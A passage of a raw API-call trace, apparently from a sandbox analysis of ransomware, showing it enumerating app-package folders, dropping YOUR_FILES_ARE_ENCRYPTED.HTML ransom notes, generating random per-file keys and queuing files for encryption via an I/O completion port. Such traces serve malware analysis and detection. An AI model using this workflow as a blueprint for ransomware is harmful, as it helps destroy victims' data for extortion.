pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState") returned 96 [0120.538] GetProcessHeap () returned 0x600000 [0120.538] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.538] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState" [0120.538] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\*" [0120.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1064efd6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1064efd6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.538] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1064efd6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1064efd6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.538] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1064efd6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1064efd6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 0 [0120.538] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.538] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.538] GetProcessHeap () returned 0x600000 [0120.538] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.539] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.540] CloseHandle (hObject=0x320) returned 1 [0120.540] GetProcessHeap () returned 0x600000 [0120.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.540] GetProcessHeap () returned 0x600000 [0120.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.540] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10ea74b0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.541] StrStrIW (lpFirst="Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.541] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe") returned 142 [0120.541] GetProcessHeap () returned 0x600000 [0120.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.541] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe" [0120.541] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\*" [0120.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10ea74b0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.542] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10ea74b0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.542] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10fd8a93, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.542] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.542] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 158 [0120.542] GetProcessHeap () returned 0x600000 [0120.542] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.543] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.543] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10fd8a93, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x62f568, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.545] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10fd8a93, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 1 [0120.545] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ecd890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9f20023c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x1131fa49, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x62f568, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.545] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.545] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 178 [0120.545] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.545] lstrlenW (lpString=".dat") returned 4 [0120.545] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.545] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\microsoft.windowsphone_10.1510.9010.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0120.546] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0120.546] GetProcessHeap () returned 0x600000 [0120.546] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.548] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="0C") returned 2 [0120.548] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="F3") returned 2 [0120.548] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="0B") returned 2 [0120.548] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="8A") returned 2 [0120.548] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="08") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="F2") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="E3") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="E4") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="73") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="C3") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="12") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="29") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="70") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="9B") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="E4") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="44") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="32") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="02") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="38") returned 2 [0120.548] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="DE") returned 2 [0120.548] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="52") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="4F") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="6E") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="0B") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="21") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="E6") returned 2 [0120.548] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="8B") returned 2 [0120.549] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="A6") returned 2 [0120.549] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="2B") returned 2 [0120.549] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="94") returned 2 [0120.549] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="3A") returned 2 [0120.549] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="6D") returned 2 [0120.549] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.549] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.549] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.549] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x10f3ff08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10f3ff08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10f3ff08, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x62f568, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.549] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.549] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 183 [0120.549] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.549] lstrlenW (lpString=".LOG1") returned 5 [0120.553] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.553] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x10f3ff08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10f3ff08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10f3ff08, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x62f568, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.553] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.553] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 183 [0120.553] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.553] lstrlenW (lpString=".LOG2") returned 5 [0120.553] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.553] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x10f3ff08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10f3ff08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10f3ff08, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x62f568, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.553] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.554] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 188 [0120.554] GetProcessHeap () returned 0x600000 [0120.554] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\microsoft.windowsphone_10.1510.9010.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.555] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.555] CloseHandle (hObject=0x324) returned 1 [0120.555] GetProcessHeap () returned 0x600000 [0120.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.556] GetProcessHeap () returned 0x600000 [0120.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.556] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10ea74b0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10ea74b0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10fd8a93, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.556] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.556] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 172 [0120.556] GetProcessHeap () returned 0x600000 [0120.556] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Microsoft.WindowsPhone_10.1510.9010.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\microsoft.windowsphone_10.1510.9010.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.558] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.559] CloseHandle (hObject=0x320) returned 1 [0120.559] GetProcessHeap () returned 0x600000 [0120.559] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.559] GetProcessHeap () returned 0x600000 [0120.559] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.561] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, 